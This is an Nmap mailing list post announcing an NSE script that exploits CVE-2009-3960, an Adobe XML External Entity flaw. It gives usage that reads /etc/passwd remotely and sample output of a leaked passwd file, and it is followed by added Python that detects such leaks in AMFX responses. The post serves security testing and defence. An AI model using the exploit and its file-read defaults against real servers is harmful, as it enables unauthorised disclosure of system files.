Nmap Development mailing list archives

[NSE] http-cve-2009-3960 (Adobe XML External Entity Injection)


From: Hani Benhabiles <kroosec () gmail com>
Date: Sat, 31 Dec 2011 15:47:06 +0100

Hi list,

description = [[
Exploits cve-2009-3960 also known as Adobe XML External Entity Injection.

This vulnerability permits reading local files remotely and is present in
BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data
Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and
ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0

For more information see:
* http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
* http://www.osvdb.org/62292
* Metasploit module: auxiliary/scanner/http/adobe_xml_inject
]]

---
-- @args http-cve-2009-3960.root Points to the root path. Defaults to "/"
-- @args http-cve-2009-3960.readfile target file to be read. Defaults to "/etc/passwd"
--
-- @usage
-- nmap --script=http-cve-2009-3960 --script-args http-cve-2009-3960.root="/root/" <target>
--
--@output
-- PORT   STATE SERVICE
-- 80/tcp open  http
--| http-cve-2009-3960:
--|     samples/messagebroker/http
--|     <?xml version="1.0" encoding="utf-8"?>
--|     <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string> [...] root:x:0:0:root:/root:/bin/bash
--|     bin:*:1:1:bin:/bin:/sbin/nologin
--|     daemon:*:2:2:daemon:/sbin:/sbin/nologin
--|     adm:*:3:4:adm:/var/adm:/sbin/nologin
--|     lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
--|     sync:*:5:0:sync:/sbin:/bin/sync
--|     shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
--|     halt:*:7:0:halt:/sbin:/sbin/halt
--|     mail:*:8:12:mail:/var/spool/mail:/sbin/nologin
--|     news:*:9:13:news:/etc/news:
--|     uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin
--|     operator:*:11:0:operator:/root:/sbin/nologin
--|     games:*:12:100:games:/usr/games:/sbin/nologin
--|     gopher:*:13:30:gopher:/var/gopher:/sbin/nologin
--|     ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
--|     nobody:*:99:99:Nobody:/:/sbin/nologin
--|     nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
--|     vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
--|     pcap:!!:77:77::/var/arpwatch:/sbin/nologin
--|     mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
--|     [...]
--|_

Cheers,
Hani

-- 
M. Hani Benhabiles
OWASP Algeria SC founder and president.
Blog: http://kroosec.blogspot.com
Twitter: kroosec <https://twitter.com/#%21/kroosec>

Attachment: http-cve-2009-3960.nse
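
An added example, not part of the original post or of the attached script: a defender-side check for the kind of response shown in the @output block above, an AMFX reply whose body carries passwd(5)-style records. The function names, the threshold of three records and the sample bodies are assumptions constructed for illustration.

```python
import re

# One passwd(5) record: name:password:UID:GID:GECOS:home:shell (shell may be empty).
PASSWD_RE = re.compile(
    r"(?<![\w.-])([a-z_][a-z0-9_-]{0,31}):[^:\s]*:(\d{1,10}):\d{1,10}:"
    r"[^:\n<]*:/[^:\s<]*:(?:/[^:\s<]*)?"
)
AMFX_RE = re.compile(r"<amfx\b[^>]*>")

def passwd_records(body):
    """Return (name, uid) for every passwd-style record found in body."""
    return [(m.group(1), int(m.group(2))) for m in PASSWD_RE.finditer(body)]

def flag_response(path, body, min_records=3):
    """Alert when an AMFX reply carries at least min_records passwd-style records."""
    records = passwd_records(body)
    amfx = AMFX_RE.search(body) is not None
    return {
        "path": path,
        "amfx": amfx,
        "records": len(records),
        "uid0": [name for name, uid in records if uid == 0],
        "alert": amfx and len(records) >= min_records,
    }

# Constructed sample bodies. AMFX_HEAD copies the envelope from the @output block;
# everything after the traits element is an assumed layout, not captured traffic.
AMFX_HEAD = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<amfx ver="3"><body targetURI="/onResult" responseURI="">'
    '<object type="flex.messaging.messages.AcknowledgeMessage">'
    '<traits><string>timestamp</string></traits><string>'
)
AMFX_TAIL = '</string></object></body></amfx>'
PASSWD_TEXT = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "bin:*:1:1:bin:/bin:/sbin/nologin\n"
    "daemon:*:2:2:daemon:/sbin:/sbin/nologin\n"
    "news:*:9:13:news:/etc/news:\n"
)
LEAK = AMFX_HEAD + PASSWD_TEXT + AMFX_TAIL
BENIGN = AMFX_HEAD + "2011-12-31T15:47:06 http://example.test:8400/samples/" + AMFX_TAIL
DOCS = PASSWD_TEXT  # same records outside an AMFX envelope: counted, not alerted

if __name__ == "__main__":
    for body in (LEAK, BENIGN, DOCS):
        print(flag_response("samples/messagebroker/http", body))
```

The check is meant for response bodies captured at a proxy or WAF in front of the message broker endpoints; it matches only the passwd record format, so other disclosed files need their own patterns.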